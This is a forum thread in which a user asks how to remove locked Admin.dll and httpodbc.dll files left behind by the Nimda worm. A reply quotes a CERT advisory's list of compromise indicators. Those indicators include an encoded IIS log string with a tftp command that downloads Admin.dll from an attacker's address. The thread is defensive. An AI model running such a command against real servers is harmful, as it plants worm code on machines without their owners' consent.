Admin.dll httpobc.dll

[manking]

I had the nimda virus. Cleaned the system reloaded win2000 files yet in the c:/ directory admin.dll and httpodbc.dll still there. I have attemped to remove these files but system sayes files are locked may be in use. I have looked none of the "prgrams" that use these dll's are running. I have attemped to use a delete on reboot program to no avail. I have tried to change the ownership nogo. I can't get the system to delete these files. I have run grisoft AVG, Mcafee, and norton to remove. All come up with clean sweeps yet I can't delete these files. Can anyone recommend a solution?

Manny

 

[hewissa]

Are you operating IIS on this server? I think the file is legit:

Recommendations for System Administrators of IIS machines
To determine if your system has been compromised, look for the following:

* a root.exe file (indicates a compromise by Code Red II or sadmind/IIS worms making the system vulnerable to the Nimda worm)
* an Admin.dll file in the root directory of c:\, d:\, or e:\ (Note that the file name Admin.dll may be legitimately installed by IIS in other directories.)
* unexpected .eml or .nws files in numerous directories
* the presence of this string: /c+tftp%20-i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll 200 in the IIS logs, where "x.x.x.x" is the IP address of the attacking system.
(Note that only the "200" result code indicates success of this command.)
--------------------------------------------------------------------------------

Quoted from

http://www.cert.org/body/advisories/CA200126_FA200126.html

You said you removed it but this site

http://www.avp.ch/avpve/worms/email/nimda.stm

also has a removal tool. Try it. I haven't used it yet, so scan it 1st...lol

Hewissa

MCSE, CCNA, CIW